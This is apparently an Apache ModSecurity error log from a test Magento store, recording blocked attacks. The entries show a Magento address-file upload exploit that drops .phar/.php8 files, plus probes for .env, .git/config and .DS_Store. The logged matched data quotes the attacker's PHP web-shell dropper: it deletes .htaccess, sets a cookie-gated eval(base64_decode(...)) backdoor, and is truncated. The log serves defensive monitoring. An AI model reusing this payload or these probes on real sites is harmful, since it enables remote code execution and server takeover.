[Tue Dec 09 21:09:12.604372 2025] [:error] [pid 616664] [client 185.65.202.110:51110] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/9/a988364f428d25.phar"] [unique_id "aTiB6LA0yIwbR96rbbSc5gAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 21:09:12.606948 2025] [:error] [pid 616664] [client 185.65.202.110:51110] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/9/a988364f428d25.phar"] [unique_id "aTiB6LA0yIwbR96rbbSc5gAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 21:09:12.607169 2025] [:error] [pid 616664] [client 185.65.202.110:51110] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/9/a988364f428d25.phar"] [unique_id "aTiB6LA0yIwbR96rbbSc5gAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 21:09:12.854744 2025] [:error] [pid 616664] [client 185.65.202.110:51110] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: a988364f428d25.php8 found within FILES:custom_attributes[country_id]: a988364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTiB6LA0yIwbR96rbbSc5wAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/a/9/a988364f428d25.phar
[Tue Dec 09 21:09:12.855716 2025] [:error] [pid 616664] [client 185.65.202.110:51110] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTiB6LA0yIwbR96rbbSc5wAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/a/9/a988364f428d25.phar
[Tue Dec 09 21:09:12.856129 2025] [:error] [pid 616664] [client 185.65.202.110:51110] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTiB6LA0yIwbR96rbbSc5wAAAAM"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/a/9/a988364f428d25.phar
[Tue Dec 09 21:09:13.168278 2025] [:error] [pid 616664] [client 185.65.202.110:51110] [client 185.65.202.110] ModSecurity: Rule 7fc0e3b22be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/9/a988364f428d25.php8"] [unique_id "aTiB6bA0yIwbR96rbbSc6AAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 21:09:13.168771 2025] [:error] [pid 616664] [client 185.65.202.110:51110] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/9/a988364f428d25.php8"] [unique_id "aTiB6bA0yIwbR96rbbSc6AAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 21:09:13.171597 2025] [:error] [pid 616664] [client 185.65.202.110:51110] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/9/a988364f428d25.php8"] [unique_id "aTiB6bA0yIwbR96rbbSc6AAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 21:09:13.171814 2025] [:error] [pid 616664] [client 185.65.202.110:51110] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/a/9/a988364f428d25.php8"] [unique_id "aTiB6bA0yIwbR96rbbSc6AAAAAM"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 21:09:45.879354 2025] [:error] [pid 627085] [client 37.112.219.146:52740] [client 37.112.219.146] ModSecurity: Rule 7fc0e3b22be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/k/ek88364f428d25.phar"] [unique_id "aTiCCXYaQXTtzv8adS8x9QAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 21:09:45.879828 2025] [:error] [pid 627085] [client 37.112.219.146:52740] [client 37.112.219.146] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/k/ek88364f428d25.phar"] [unique_id "aTiCCXYaQXTtzv8adS8x9QAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 21:09:45.882763 2025] [:error] [pid 627085] [client 37.112.219.146:52740] [client 37.112.219.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/k/ek88364f428d25.phar"] [unique_id "aTiCCXYaQXTtzv8adS8x9QAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 21:09:45.882970 2025] [:error] [pid 627085] [client 37.112.219.146:52740] [client 37.112.219.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/k/ek88364f428d25.phar"] [unique_id "aTiCCXYaQXTtzv8adS8x9QAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 21:09:46.900937 2025] [:error] [pid 627085] [client 37.112.219.146:52740] [client 37.112.219.146] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: ek88364f428d25.php8 found within FILES:custom_attributes[country_id]: ek88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTiCCnYaQXTtzv8adS8x9gAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/e/k/ek88364f428d25.phar
[Tue Dec 09 21:09:46.901570 2025] [:error] [pid 627085] [client 37.112.219.146:52740] [client 37.112.219.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTiCCnYaQXTtzv8adS8x9gAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/e/k/ek88364f428d25.phar
[Tue Dec 09 21:09:46.901742 2025] [:error] [pid 627085] [client 37.112.219.146:52740] [client 37.112.219.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aTiCCnYaQXTtzv8adS8x9gAAAAE"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/e/k/ek88364f428d25.phar
[Tue Dec 09 21:09:47.399543 2025] [:error] [pid 627085] [client 37.112.219.146:52740] [client 37.112.219.146] ModSecurity: Rule 7fc0e3b22be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/k/ek88364f428d25.php8"] [unique_id "aTiCC3YaQXTtzv8adS8x9wAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 21:09:47.400014 2025] [:error] [pid 627085] [client 37.112.219.146:52740] [client 37.112.219.146] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/k/ek88364f428d25.php8"] [unique_id "aTiCC3YaQXTtzv8adS8x9wAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 21:09:47.402537 2025] [:error] [pid 627085] [client 37.112.219.146:52740] [client 37.112.219.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/k/ek88364f428d25.php8"] [unique_id "aTiCC3YaQXTtzv8adS8x9wAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Dec 09 21:09:47.402724 2025] [:error] [pid 627085] [client 37.112.219.146:52740] [client 37.112.219.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/e/k/ek88364f428d25.php8"] [unique_id "aTiCC3YaQXTtzv8adS8x9wAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 10 13:39:50.551713 2025] [authz_core:error] [pid 636936] [client 159.65.18.197:44566] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Wed Dec 10 13:39:53.950560 2025] [:error] [pid 642267] [client 159.65.18.197:44598] [client 159.65.18.197] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aTlqGeZ0wa7AiKX8edeoTwAAAAI"]
[Wed Dec 10 13:39:53.950807 2025] [:error] [pid 642267] [client 159.65.18.197:44598] [client 159.65.18.197] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aTlqGeZ0wa7AiKX8edeoTwAAAAI"]
[Wed Dec 10 13:39:53.950992 2025] [:error] [pid 642267] [client 159.65.18.197:44598] [client 159.65.18.197] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aTlqGeZ0wa7AiKX8edeoTwAAAAI"]
[Wed Dec 10 13:39:54.686237 2025] [:error] [pid 642268] [client 159.65.18.197:44602] [client 159.65.18.197] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTlqGijDeI-4sHVdKxOQRAAAAAw"]
[Wed Dec 10 13:39:54.686509 2025] [:error] [pid 642268] [client 159.65.18.197:44602] [client 159.65.18.197] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTlqGijDeI-4sHVdKxOQRAAAAAw"]
[Wed Dec 10 13:39:54.686694 2025] [:error] [pid 642268] [client 159.65.18.197:44602] [client 159.65.18.197] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aTlqGijDeI-4sHVdKxOQRAAAAAw"]
[Wed Dec 10 13:39:57.057854 2025] [:error] [pid 636939] [client 159.65.18.197:44604] [client 159.65.18.197] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTlqHbCnovWtbeVvHnHXNQAAAAQ"]
[Wed Dec 10 13:39:57.058138 2025] [:error] [pid 636939] [client 159.65.18.197:44604] [client 159.65.18.197] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTlqHbCnovWtbeVvHnHXNQAAAAQ"]
[Wed Dec 10 13:39:57.058413 2025] [:error] [pid 636939] [client 159.65.18.197:44604] [client 159.65.18.197] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aTlqHbCnovWtbeVvHnHXNQAAAAQ"]
[Wed Dec 10 13:51:01.858718 2025] [:error] [pid 642265] [client 46.149.66.101:37208] [client 46.149.66.101] ModSecurity: Rule 7f07ac261be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/8/2888364f428d25.phar"] [unique_id "aTlstbP2BPelBlHY7gEe2wAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 10 13:51:01.859230 2025] [:error] [pid 642265] [client 46.149.66.101:37208] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/8/2888364f428d25.phar"] [unique_id "aTlstbP2BPelBlHY7gEe2wAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Dec 10 13:51:01.861742 2025] [:error] [pid 642265] [client 46.149.66.101:37208] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/2/8/2888364f428d25.phar"] [unique_id "aTlstbP2BPelBlHY7gEe2wAAAAs"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
